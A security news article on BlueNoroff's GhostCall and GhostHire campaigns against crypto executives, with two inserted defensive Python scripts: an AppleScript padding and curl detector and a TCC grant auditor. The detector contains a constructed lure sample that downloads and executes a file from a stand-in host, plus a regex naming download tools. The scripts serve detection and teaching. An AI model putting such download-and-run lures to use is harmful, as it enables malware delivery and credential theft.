BlueNoroff Hackers Adopt New Infiltration Strategies To Attack C-Level Executives and Managers

The BlueNoroff threat group, also tracked as Sapphire Sleet, APT38, and TA444, has significantly evolved its targeting capabilities with sophisticated new infiltration strategies designed specifically to compromise C-level executives and senior managers within the Web3 and blockchain sectors.

The group, historically focused on financial gain through cryptocurrency theft, has launched two coordinated campaigns, dubbed GhostCall and GhostHire, that represent a substantial shift in both technical sophistication and social engineering tactics.

Securelist analysts and researchers identified these campaigns beginning in April 2025, revealing a multi-faceted approach that combines deceptive video conferencing infrastructure with advanced malware deployment chains.

The GhostCall campaign predominantly targets macOS users at technology companies and venture capital firms through fraudulent investment-related meetings, while GhostHire focuses on Web3 developers using fake recruitment processes.

Both campaigns demonstrate the group’s ability to leverage generative AI for crafting convincing phishing materials and enhancing social engineering effectiveness.

[Figure: Overall behavior of the phishing site (Source – Securelist)]

The emergence of these campaigns marks a deliberate platform shift from Windows to macOS, chosen to align with the target demographic’s predominantly Apple-based infrastructure.


This strategic decision enables the group to deploy specifically engineered malware chains optimized for macOS environments, creating significantly fewer detection opportunities across typical enterprise security stacks.

Attack Vector Innovation: The Fake Video Call Infrastructure

The GhostCall campaign employs an innovative attack mechanism centered on fabricated Zoom and Microsoft Teams environments hosted on attacker-controlled domains.

Victims receive Telegram-based invitations to investment meetings featuring phishing URLs mirroring legitimate conference platforms.

Upon joining fake calls, targets encounter carefully staged scenes displaying video recordings of previously compromised victims rather than deepfakes, creating convincing authenticity.

[Figure: Initial infection flow (Source – Securelist)]

The interface then prompts users to download a supposed SDK update, which actually delivers a malicious AppleScript file padded with nearly 10,000 blank lines so that the payload-extraction logic sits far below anything a casual reviewer would see.

The infection chains employ sophisticated code injection techniques utilizing the proprietary GillyInjector framework.

The AppleScript executes a curl command downloading additional stages, ultimately installing modular malware components including CosmicDoor backdoors, RooTroy downloaders, and SilentSiphon stealer suites.
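The two traits described above, a huge run of blank lines followed by a `do shell script` that invokes `curl`, are cheap to check for on a mail gateway or in an EDR script-content rule. The following detector is an added example written for this article, not code from Securelist or from the campaign; the thresholds, the sample script and the `update.example.invalid` hostname are constructed for illustration.

```python
import re
from typing import Dict, List

# Heuristic thresholds (assumptions chosen for this example): a hand-written
# AppleScript almost never contains hundreds of consecutive empty lines.
BLANK_RUN_THRESHOLD = 500
SHELL_RE = re.compile(r"do\s+shell\s+script", re.IGNORECASE)
REMOTE_FETCH_RE = re.compile(r"\b(curl|wget|nscurl)\b", re.IGNORECASE)


def longest_blank_run(lines: List[str]) -> int:
    """Length of the longest run of whitespace-only lines."""
    longest = current = 0
    for line in lines:
        if line.strip() == "":
            current += 1
            longest = max(longest, current)
        else:
            current = 0
    return longest


def analyze_applescript(source: str) -> Dict[str, object]:
    """Score an AppleScript source text for the padding + downloader pattern."""
    lines = source.splitlines()
    # (line number, text) of every shell-out, so an analyst can jump to it.
    shell_lines = [(i + 1, ln.strip()) for i, ln in enumerate(lines) if SHELL_RE.search(ln)]
    remote = [(n, ln) for n, ln in shell_lines if REMOTE_FETCH_RE.search(ln)]
    run = longest_blank_run(lines)
    padded = run >= BLANK_RUN_THRESHOLD
    return {
        "total_lines": len(lines),
        "longest_blank_run": run,
        "padded": padded,
        "shell_commands": shell_lines,
        "remote_fetch": bool(remote),
        # Either trait alone is weak; together they match the described lure.
        "suspicious": padded and bool(remote),
    }


def scan_file(path: str) -> Dict[str, object]:
    """Convenience wrapper for scanning a .scpt/.applescript text file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return analyze_applescript(fh.read())


# Constructed sample mimicking the layout the report describes: one visible
# line, ~10,000 blank lines, then the real work hidden at the bottom.
SAMPLE_MALICIOUS = (
    'display dialog "Installing SDK update..." buttons {"OK"}\n'
    + "\n" * 10000
    + 'do shell script "curl -s https://update.example.invalid/sdk -o /tmp/sdk_update"\n'
    + 'do shell script "chmod +x /tmp/sdk_update; /tmp/sdk_update"\n'
)

# Constructed benign script for comparison: a shell-out, but no padding or fetch.
SAMPLE_BENIGN = (
    'set folderName to "Reports"\n'
    "\n"
    'do shell script "mkdir -p ~/Documents/" & folderName\n'
)

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        r = analyze_applescript(src)
        print(label, "blank run:", r["longest_blank_run"], "suspicious:", r["suspicious"])
```

The `shell_commands` list is what you would forward to a triage queue: line numbers in the tens of thousands on a file whose visible content is one dialog are themselves a strong signal, independent of which hostname the `curl` points at.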

Most notably, the stealer modules comprehensively harvest sensitive data spanning cryptocurrency wallets, browser credentials, SSH keys, cloud infrastructure tokens, DevOps configurations, and Telegram account sessions.

The technical implementation showcases unprecedented sophistication, leveraging RC4 encryption for configuration management, AES-256 algorithms for payload protection, and strategic TCC database manipulation enabling unrestricted system access without user consent prompts.
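Because the report says the chain tampers with the TCC database to suppress consent prompts, the matching defender check is an audit of which clients currently hold high-impact TCC grants. The script below is an added example for this article, not Securelist's or the malware's code. It assumes the `access` table's `service`, `client`, `client_type` and `auth_value` columns as found on macOS 11 and later (the real table has more columns, which the query does not touch; `auth_value` 2 is taken to mean "allowed"), and it builds a constructed database so it runs anywhere; the allow-list and the flagged `/tmp/sdk_update` path are illustrative.

```python
import os
import sqlite3
import tempfile
from typing import Dict, Iterable, List

# Services whose grants give a process broad reach (assumption: a short list
# picked for illustration; the real database holds many more service names).
HIGH_IMPACT_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",  # Full Disk Access
    "kTCCServiceAccessibility",         # synthetic input / UI control
    "kTCCServiceScreenCapture",
    "kTCCServiceAppleEvents",           # automation of other applications
}
AUTH_ALLOWED = 2  # assumption: auth_value meaning "allowed" on macOS 11+

# Real locations (read-only access to the system copy itself requires
# Full Disk Access for the auditing process).
SYSTEM_TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"
USER_TCC_DB = os.path.expanduser("~/Library/Application Support/com.apple.TCC/TCC.db")


def audit_tcc(db_path: str, expected_clients: Iterable[str]) -> List[Dict[str, object]]:
    """Return allowed high-impact grants whose client is not on the allow-list."""
    expected = set(expected_clients)
    findings: List[Dict[str, object]] = []
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)
    try:
        rows = conn.execute(
            "SELECT service, client, client_type, auth_value FROM access "
            "WHERE auth_value = ?",
            (AUTH_ALLOWED,),
        )
        for service, client, client_type, auth_value in rows:
            if service in HIGH_IMPACT_SERVICES and client not in expected:
                findings.append({
                    "service": service,
                    "client": client,
                    # 0 = bundle identifier, 1 = absolute path (path-based
                    # grants to /tmp or /Users/Shared deserve a closer look)
                    "client_type": client_type,
                    "auth_value": auth_value,
                })
    finally:
        conn.close()
    return findings


def build_constructed_db(path: str) -> None:
    """Create a minimal stand-in for TCC.db with constructed rows."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, "
        "client_type INTEGER, auth_value INTEGER)"
    )
    conn.executemany(
        "INSERT INTO access VALUES (?, ?, ?, ?)",
        [
            ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, AUTH_ALLOWED),
            ("kTCCServiceSystemPolicyAllFiles", "/tmp/sdk_update", 1, AUTH_ALLOWED),
            ("kTCCServiceAccessibility", "/tmp/sdk_update", 1, AUTH_ALLOWED),
            ("kTCCServiceCamera", "us.zoom.xos", 0, AUTH_ALLOWED),  # not high-impact here
            ("kTCCServiceScreenCapture", "com.example.denied", 0, 0),  # denied, ignored
        ],
    )
    conn.commit()
    conn.close()


def run_demo() -> List[Dict[str, object]]:
    """Build the constructed database in a temp dir and audit it."""
    workdir = tempfile.mkdtemp(prefix="tcc_audit_")
    db_path = os.path.join(workdir, "TCC.db")
    build_constructed_db(db_path)
    return audit_tcc(db_path, expected_clients=["com.apple.Terminal"])


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['service']}: {f['client']} (client_type={f['client_type']})")
```

On a real host you would call `audit_tcc(SYSTEM_TCC_DB, allowlist)` and `audit_tcc(USER_TCC_DB, allowlist)` from a scheduled job and alert on any new finding; a path-typed grant (`client_type` 1) to a freshly created binary is exactly the shape the report's consent-bypass would leave behind.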

This represents a significant maturation in the group’s operational capabilities and underscores the critical risks facing cryptocurrency industry executives.
